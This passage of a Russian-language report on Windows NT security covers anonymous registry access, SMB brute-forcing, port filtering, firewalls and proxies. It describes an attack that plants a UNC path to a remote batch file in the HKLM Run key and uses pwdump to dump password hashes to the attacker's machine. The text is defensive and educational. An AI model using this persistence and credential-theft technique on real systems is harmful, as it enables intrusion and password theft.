Во  время анонимного сеанса злоумышленник  может удаленно подсоединиться к  системному реестру сервера с  помощью программ Regedit или Regedt32, при этом при просмотре и модификации реестра он будет иметь права группы Everyone.

       По  умолчанию NT Workstation предоставляет анонимному пользователю доступ к большинству ключей реестра, поэтому взломщик может получить очень много информации о вашей рабочей станции. Кроме того, группа Everyone имеет права на редактирование некоторых важных системных ключей, благодаря чему анонимный пользователь способен не только дезорганизовать работу операционной системы, но получить к нему административный доступ.

       Для этих целей им может быть использован, например, ключ HKLM\Software\Microsoft\Windows\CurrentVersion\Run. Этот ключ содержит имена программ, автоматически запускаемых при каждой локальной регистрации пользователя. Указав в этом ключе нужное имя, он может заставить атакуемую машину выполнить любую команду. Предположим, злоумышленник прописал в ключе Run команду \\имя_компьютера_злоумышленника\Share\hackNT.bat. Теперь после очередной локальной регистрации атакованная машина попытается связаться с компьютером злоумышленника и запустить командный файл hackNT.bat из сетевой папки Share. Командный файл будет выполнен в контексте безопасности того пользователя, который в данный момент локально зарегистрировался на сервере. Таким образом, если пользователь зарегистрировался с правами администратора, то hackNT.bat сможет осуществить любые действия в системе. К примеру, вызов из hackNT.bat программы pwdump.exe заставит атакованный сервер создать на компьютере злоумышленника файл с именами и хэшированными паролями пользователей сервера. Для осуществления данной атаки взломщику даже не требуется иметь прав на доступ к сетевым ресурсам сервера. Поэтому любой злоумышленник безо всякой регистрации способен подсоединиться к NT Workstation и получить пароли пользователей.

       В Windows NT Server удаленный доступ к реестру контролируется с помощью ключа Winreg. Права на доступ к этому ключу определяют тех, кто может работать с реестром. По умолчанию подобным правом обладают только администраторы. Однако, несмотря на ограничения, налагаемые ключом Winreg, анонимный пользователь все же имеет доступ к разделу .DEFAULT ветви HKEY_USERS и еще к нескольким разделам реестра, перечисленным в ключе Winreg\AllowedPath.

       NT Workstation и NT Server в стандартной конфигурации уязвимы для атаки с использованием анонимного доступа к реестру, и взлом этих систем для хакера – лишь вопрос времени. Лучшим решением данной проблемы является установка на вашей машине сервисного пакета Service Pack 3, так как он запрещает доступ к реестру в рамках анонимного сеанса. Однако не забывайте, что Service Pack 3 блокирует только анонимный доступ к реестру. Любой зарегистрированный пользователь все равно сможет удаленно провести атаку на реестр и получить права администратора. Для предотвращения нежелательных действий со стороны авторизованных пользователей администратору следует вручную выставить более жесткие разрешения на ключи реестра в соответствии с рекомендациями, приведенными на сервере Microsoft.

       При анонимном сетевом подключении  злоумышленник может получить список имен всех зарегистрированных на сервере  пользователей с помощью программ USER2SID и SID2USER. После этого он может  предпринять попытку угадать  пароль. В Internet имеется несколько программ, с помощью которых злоумышленник может попытаться зарегистрироваться на сервере SMB, перебирая пароли по словарю. Такие атаки обычно занимают очень много времени и могут быть успешными только в случае слабых паролей.

       Для предотвращения подобных атак по методу грубой силы пароли следует задавать длиной не менее 8 символов, при этом они должны представлять собой случайную  комбинацию букв и цифр. Кроме того, администратор должен ввести обязательный аудит неудачных попыток регистрации. Кроме того, желательно перечислить всех пользователей и группы, которым разрешен доступ к компьютеру по сети.

       Соблюдение  приведенных рекомендаций позволит надежно защитить сервер SMB на базе Windows NT от попыток несанкционированного проникновения. Однако службы разделения сетевых ресурсов предоставляют слишком много возможностей для злоумышленника, поэтому число пользователей, имеющих сетевой доступ к системным ресурсам, следует максимально ограничить.

       4 Защита при работе в сети  Internet

       При подключении к Internet информационные ресурсы локальной сети становятся доступными огромному неконтролируемому сообществу, поэтому администратор должен найти способ жестко ограничить спектр допустимых для внешнего пользователя действий.

       Теоретически  все сетевые службы вашей системы, рассчитанные на работу поверх транспортного  протокола TCP/IP, могут быть использованы при вторжении извне. По умолчанию  в Windows NT никакие специальные Internet-сервисы не устанавливаются. Входящий в дистрибутив NT Server 4.0 сервер Internet Information Server (IIS) 2.0 предлагает три основные службы: WWW, FTP и Gopher. Рассмотрим только подключение к Internet частных сетей, когда предоставление каких-либо информационных ресурсов внешнему миру не планируется, а цель соединения с глобальной сетью состоит в организации безопасного доступа локальных пользователей к ресурсам Internet.

       Прежде  чем предпринимать какие-либо действия по защите системы, администратору следует  просканировать локальную сеть на наличие  открытых TCP/UDP-портов. По номерам этих портов он сможет легко определить, какие внутренние сетевые службы могут быть доступны извне.

       Как правило, в системе NT открыты порты 137/UDP, 138/UDP и 139/TCP, все они используются службами NBT (NetBIOS over TCP/IP). Для разделения ресурсов в сетях Windows серверы SMB используют программный сетевой интерфейс NetBIOS. Доступ извне к сервисам NBT должен быть запрещен в первую очередь, так как в противном случае ваша система будет уязвима ко всем тем видам SMB-атак, которые мы описали в предыдущем разделе. Кроме портов NBT на компьютерах с ОС Windows NT по умолчанию открыт порт 135/TCP, используемый для удаленного вызова процедур (RPC). Его также следует закрыть для внешних пользователей.

       Любую автономную систему NT можно защитить от внешних атак, запретив работу интерфейса NetBIOS поверх протокола TCP/IP. После этого сервисы SMB не смогут работать по протоколу TCP/IP и, следовательно, не будут доступны из Internet. Если администратор вообще не собирается предоставлять ресурсы системы для сетевого доступа, то проще всего удалить сервис Server из вкладки Services. Наиболее полной защиты можно добиться посредством запрета входящих соединений TCP и UDP. После запрета входящих соединений можно, как и прежде, пользоваться всеми информационными ресурсами Internet, однако взломщик уже не будет способен инициировать соединение с вашей системой.

       При подключении частной сети к Internet необходимо использовать брандмауэр. Брандмауэр как минимум обеспечивает фильтрацию нежелательного трафика между Internet и вашей частной сетью, например, сообщений, которыми обмениваются два компьютера в этой сети. Перечисленные базовые функции брандмауэра способно выполнять большинство выделенных маршрутизаторов. Кроме того, брандмауэр должен блокировать весь трафик с Internet через 135/TCP-, 137/UDP-, 138/UDP- и 139/TCP-порты. Это предотвратит прямые атаки извне с помощью NetBIOS и RPC.

       Хотя  фильтрация пакетов обеспечивает базовую  защиту, значительная часть вашей  внутренней сети продолжает оставаться видимой для внешнего мира. Один из методов решения этой проблемы - введение уполномоченного сервера (proxy server). Все взаимодействие с Internet осуществляется через уполномоченный сервер, а адреса внутренней сети будут недоступны извне и защищены от непосредственной атаки. Вместо того чтобы общаться напрямую, например, с Web-сервером в Internet, пользователи сети организации будут взаимодействовать с уполномоченным сервером, а тот в свою очередь пересылать их запросы на сервер Internet. Для Internet сеть организации будет выглядеть как единственный пользователь Web с одним IP-адресом. Уполномоченный сервер обеспечивает большую защищенность внутренней сети по сравнению с брандмауэром. 

Заключение

       В результате выделим  основные механизмы защиты являются:

       – идентификация и аутентификация пользователя при входе в систему;

       – разграничение прав доступа к  ресурсам, в основе которого лежит  реализация дискреционной модели доступа (отдельно к объектам файловой системы, к устройствам, к реестру ОС, к  принтерам и др.);

       – аудит, т.е. регистрация событий.

       Здесь явно выделяются возможности разграничений  прав доступа к файловым объектам (для NTFS) – существенно расширены атрибуты доступа, устанавливаемые на различные иерархические объекты файловой сис-

       темы (логические диски, каталоги, файлы). В  частности, атрибут "исполнение" может устанавливаться и на каталог, тогда он

       наследуется соответствующими файлами.

       При этом существенно ограничены возможности  управления доступом к другим защищаемым ресурсам, в частности, к устройствам ввода.

       По  умолчанию система безопасности Windows NT достаточно слаба и легко поддается взлому. Вместе с тем NT предоставляет пользователю большой набор средств для создания надежной конфигурации и обеспечения необходимого уровня защиты.

       Прежде  чем приступать к разработке мер  безопасности, администратору следует  выявить все слабые места компьютерной сети с точки зрения нарушения  конфиденциальности информации и проанализировать, какие опасения реальны, а какие  не имеют под собой почвы. Чтобы  правильно оценить степень риска, необходимо изучить список всех известных  опасных ситуаций и средств, которыми пользуются злоумышленники. 

        Библиографический список

       1 Служба регистрации в Windows NT [Электронный ресурс] Электрон. текстовые дан. Режим доступа: http://www.bnti.ru/showart.asp.

       2 Защита системы на базе Windows NT [Электронный ресурс] Электрон. текстовые дан. Режим доступа:http://iso27000.ru/bezopasnost-operacionnyh-sistem na-baze-windows-nt.

       3 Особенности сетевого доступа в Windows NT [Электронный ресурс] Электрон. текстовые дан. Режим доступа: http://www.hardvision.ru/to_aticles.

       4 Безопасность в ОС [Электронный ресурс] Электрон. текстовые дан. Режим доступа: http://window.edu.ru/window_catalog/r56669.

       5 Основные службы и механизмы защиты информации [Электронный ресурс] Электрон. текстовые дан. Режим доступа: http://otheroffers.ru/00032885.html.